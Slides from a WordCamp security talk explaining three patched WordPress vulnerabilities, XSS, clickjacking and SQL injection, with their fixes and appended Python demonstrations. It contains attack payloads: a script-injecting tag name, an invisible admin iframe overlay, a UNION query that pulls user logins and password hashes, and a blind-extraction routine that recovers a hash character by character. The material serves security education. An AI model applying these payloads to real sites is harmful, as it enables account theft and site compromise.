anatomy of a wordpress hack

Post on 22-Apr-2015


DESCRIPTION

Slides for Brennen Byrne's talk, Anatomy of a WordPress Hack, given at WordCamp Boston.

TRANSCRIPT

@brennenbyrne

ANATOMY OF A WORDPRESS HACK

security is hard

security is REALLY hard

security is REALLY REALLY hard

but probably NOT for the reasons you're thinking

that's because security is all about the details

3 hacks that broke wordpress

(and how they were fixed)

clickjacking

xss

sqli

this talk is probably for you

(it's a really good talk)

you might be wondering

"if these have already been fixed, why are we still talking about them?"

almost 20% of the web runs on wordpress

lots of attacks on wordpress sites

they'll happen again

it's fun and interesting

hello, my name is brennen

@brennenbyrne

I’m a founder of Clef (getclef.com)

anatomy of a wordpress hack

XSS cross site scripting

when a hacker is able to run arbitrary code in every user's browser

let's hack

how

<{$icontag} class='gallery-icon'> ... </{$icontag}>

< begin html open tag

{$icontag} unsanitized user input

> end html open tag

</ begin html close tag

{$icontag} unsanitized user input

> end html close tag

the same unsanitized user input lands in the page twice, as the name of the open tag and of the close tag

exploit

$icontag = "script src='hack.js'"

create a script tag

load an evil script

how bad is this?

full site compromise

one line fix!

$icontag = tag_escape($icontag)

removes potentially malicious code: every character that is not a letter, digit, underscore or colon is stripped, so quotes, spaces and attributes cannot survive
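The vulnerable gallery markup beside its escaped form, as an added example (not code from the talk or from WordPress). `tag_escape` here is a reimplementation of WordPress' function written for this example, the inner markup is a constructed stand-in for a gallery thumbnail, and the allowlist of icon tags is an assumption added to show a stricter variant than the one-line fix.

```python
import re

# Constructed sample: the markup the gallery shortcode wraps each thumbnail in.
INNER = "<a href='/?attachment_id=1'><img src='thumb.jpg' /></a>"

# Tag names the gallery is allowed to use for its icon element (assumption for
# this example; 'dt' is the shortcode's default icon tag).
ALLOWED_ICON_TAGS = {"dt", "div", "span", "li"}


def tag_escape(tag_name):
    """Reimplementation (for this example) of WordPress tag_escape():
    drop every character outside [a-zA-Z0-9_:] and lowercase the rest."""
    return re.sub(r"[^a-zA-Z0-9_:]", "", tag_name).lower()


def render_icon_vulnerable(icontag):
    # The shortcode attribute goes straight into the tag name, so attacker
    # text becomes part of the HTML open and close tags.
    return f"<{icontag} class='gallery-icon'>{INNER}</{icontag}>"


def render_icon_escaped(icontag):
    # The one-line fix from the talk: the attribute is reduced to a bare tag
    # name, so quotes, spaces, '=' and '>' cannot survive and no attribute
    # (such as src='hack.js') can be injected.
    icontag = tag_escape(icontag)
    return f"<{icontag} class='gallery-icon'>{INNER}</{icontag}>"


def render_icon_allowlisted(icontag):
    # Stricter variant (added here): after escaping, fall back to the default
    # tag unless the name is one the gallery is meant to emit. The attacker
    # then cannot even choose the element type (e.g. a bare 'script').
    icontag = tag_escape(icontag)
    if icontag not in ALLOWED_ICON_TAGS:
        icontag = "dt"
    return f"<{icontag} class='gallery-icon'>{INNER}</{icontag}>"


def contains_injected_script(html):
    # Tiny oracle for the demo: does the output open a <script ...> tag?
    return re.search(r"<script\b", html, re.IGNORECASE) is not None


PAYLOAD = "script src='hack.js'"   # the payload from the talk

if __name__ == "__main__":
    print(render_icon_vulnerable(PAYLOAD))
    print(render_icon_escaped(PAYLOAD))
    print(render_icon_allowlisted("script"))
```

Note the caveat the allowlisted variant addresses: `tag_escape` guarantees a bare tag name, not a harmless one, so the payload `script` (without attributes) still yields a `<script>` element around the gallery's own markup; restricting the name to a known set closes that too.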

Clickjacking

clickjacking: when a hacker tricks you into clicking something you don't want to click

let's hack

how

this is your site

this is your site with an iframe

www.another-site.com

now imagine the green is the article

and the red is "delete post"

<iframe src="admin_url" style="opacity: 0; z-index: 100"></iframe>

<iframe> embedding site in another site

src="admin_url" embedding admin page

opacity: 0 admin page is fully transparent

z-index: 100 admin page is above another page

the visitor thinks they are clicking the article, but the click lands on "delete post"

the mistake: allowing embedding of valuable pages

how bad is this?

full site compromise

one line fix!

@header( 'X-Frame-Options: SAMEORIGIN' );

add header to responses for valuable pages (the @ silences PHP's warning if output has already started)

tell browser to only allow iframe embed when it's on the same origin
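The fix as a response-header check, as an added example (not code from the talk or from WordPress): a small WSGI wrapper that adds `X-Frame-Options: SAMEORIGIN` (and its Content-Security-Policy successor `frame-ancestors 'self'`) to responses for protected paths, plus the decision a browser makes when the attacker's page tries to frame them. The attacker page, the demo app and the protected path prefixes are constructed for this example.

```python
import io

# Constructed attacker page, as described in the talk: the admin page is loaded
# in an invisible iframe stacked above the visible article, so the victim's
# click lands on "delete post".
ATTACKER_PAGE = """<html><body>
<h1>Win a free prize! Click the button below.</h1>
<iframe src="https://victim-blog.example/wp-admin/"
        style="opacity: 0; z-index: 100; position: absolute; top: 0; left: 0;
               width: 800px; height: 600px"></iframe>
</body></html>"""

# Paths whose responses must refuse to be framed (assumption for the example).
PROTECTED_PREFIXES = ("/wp-admin/", "/wp-login.php")


def frame_protection(app, protected_prefixes=PROTECTED_PREFIXES):
    """WSGI middleware: add X-Frame-Options: SAMEORIGIN and the equivalent CSP
    frame-ancestors directive to every response for a protected path."""
    def wrapped(environ, start_response):
        path = environ.get("PATH_INFO", "")

        def guarded_start(status, headers, exc_info=None):
            if path.startswith(protected_prefixes):
                headers = [(k, v) for k, v in headers
                           if k.lower() not in ("x-frame-options", "content-security-policy")]
                headers.append(("X-Frame-Options", "SAMEORIGIN"))
                headers.append(("Content-Security-Policy", "frame-ancestors 'self'"))
            return start_response(status, headers, exc_info)

        return app(environ, guarded_start)
    return wrapped


def demo_app(environ, start_response):
    # Stand-in for the site: the admin page with its dangerous "delete post" action.
    start_response("200 OK", [("Content-Type", "text/html")])
    if environ.get("PATH_INFO", "").startswith("/wp-admin/"):
        return [b"<form method='post'><button>delete post</button></form>"]
    return [b"<article>public article</article>"]


def call(app, path):
    """Drive a WSGI app offline; returns (status, headers dict, body bytes)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path,
               "wsgi.input": io.BytesIO(b"")}
    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


def is_frameable_cross_origin(headers):
    """What a browser decides for the attacker's page: may it frame this response?"""
    xfo = headers.get("X-Frame-Options", "").upper()
    csp = headers.get("Content-Security-Policy", "")
    return xfo not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in csp


if __name__ == "__main__":
    for app, label in ((demo_app, "before"), (frame_protection(demo_app), "after")):
        status, headers, body = call(app, "/wp-admin/")
        print(label, status, headers.get("X-Frame-Options"), is_frameable_cross_origin(headers))
```

The header has to be on the response of the page being framed (the admin page), not on the attacker's page; a public article is deliberately left frameable here, which is why the protection is scoped to the valuable paths rather than applied blindly.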

SQL injection

SQL injection: when bad people access your database in bad ways

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

let's hack

how

SELECT ... LIMIT $args[4]

SELECT ... select categories from database

LIMIT limit number of categories selected

$args[4] unsanitized user input

exploit

$args[4] = "1 OFFSET 1 UNION ALL SELECT user_login, user_pass FROM wp_users"

1 OFFSET 1 limit to 1 category and offset by 1

UNION ALL SELECT ... embed a second SQL query

user_login, user_pass FROM wp_users steal usernames and (hashed) passwords

5 character fix!

(int) $args[4]

sanitize user input by coercing it to an integer

how bad is this?

full site compromise
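The LIMIT injection and its integer-cast fix run against an in-memory SQLite database, as an added example (not code from the talk or from WordPress). The tables and the password hash are constructed for the example, `php_int` is a simplified emulation of PHP's `(int)` cast, and the talk's UNION payload is MySQL-flavoured and is shown only as the query text it produces: SQLite rejects UNION after LIMIT, so the extraction here uses a swapped-in technique, a boolean-based blind read through a subquery in OFFSET, which SQLite does accept. Same root cause, same fix.

```python
import re
import sqlite3
import string

# Constructed tables standing in for wp_terms and wp_users; the hash is made up.
SCHEMA = """
CREATE TABLE wp_terms (term_id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO wp_terms (name) VALUES ('Uncategorized'), ('News'), ('Security');
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_users (user_login, user_pass) VALUES ('admin', '$P$BfakeHash0');
"""

# The talk's payload (MySQL-flavoured); used here only to show the resulting SQL.
TALK_PAYLOAD = "1 OFFSET 1 UNION ALL SELECT user_login, user_pass FROM wp_users"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def categories_sql_vulnerable(limit):
    # $args[4] pasted into the query text, exactly as in the vulnerable code.
    return f"SELECT name FROM wp_terms ORDER BY term_id LIMIT {limit}"


def php_int(value):
    """Emulates PHP's (int) cast on a string (assumption: simplified): leading
    whitespace, an optional sign and digits are kept, anything else yields 0."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def get_categories_vulnerable(conn, limit):
    return [row[0] for row in conn.execute(categories_sql_vulnerable(limit))]


def get_categories_fixed(conn, limit):
    # The five-character fix: coerce to an integer. Binding it as a parameter
    # is extra hardening added here; the cast alone already removes the SQL.
    return [row[0] for row in conn.execute(
        "SELECT name FROM wp_terms ORDER BY term_id LIMIT ?", (php_int(limit),))]


def extract_password_hash(conn, user_login="admin"):
    """Boolean-based blind extraction through the unsanitized LIMIT argument.

    Each guess puts a subquery in OFFSET that evaluates to 0 (first category
    comes back) when the guessed character matches the stored hash and to 1
    (second category comes back) when it does not, so the returned category
    name is the oracle. Stops when no character in the alphabet matches.
    """
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    while True:
        for guess in alphabet:
            payload = (
                "1 OFFSET (SELECT CASE WHEN substr(user_pass, "
                f"{len(recovered) + 1}, 1) = '{guess}' THEN 0 ELSE 1 END "
                f"FROM wp_users WHERE user_login = '{user_login}')"
            )
            if get_categories_vulnerable(conn, payload) == ["Uncategorized"]:
                recovered += guess
                break
        else:
            return recovered   # nothing matched: end of the hash


if __name__ == "__main__":
    conn = connect()
    print(categories_sql_vulnerable(TALK_PAYLOAD))
    print(extract_password_hash(conn))
    print(get_categories_fixed(conn, TALK_PAYLOAD))
```

Two things worth noticing: the blind variant needs no error messages and no UNION, only the ability to tell one legitimate result from another, so "the injected SQL is a syntax error on our database" is not a defence; and `php_int(TALK_PAYLOAD)` is 1, which is exactly why the talk's five-character cast neutralises the payload instead of rejecting it.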

how does this happen?

security is in the details

security is hard

so what should you do?

1 you cannot know everything

you can always learn more

education

2 you will always make mistakes

you must learn from your mistakes

experience

3 you cannot write secure code

we can write secure code

community

closing thoughts

thanks

XSS Jon Cave

Clickjacking Andrew Horton

SQLi Alexander Concha

CSRF Alexander Concha

WordPress Security Team

WordPress Community

what if I find a security issue?

DO

1. verify that it is a real issue

2. email security@wordpress.org

DON'T

1. maliciously exploit other wordpress sites

2. publish details of the vulnerability before it has been fixed

upgrade to 3.7

SELECT * FROM questions
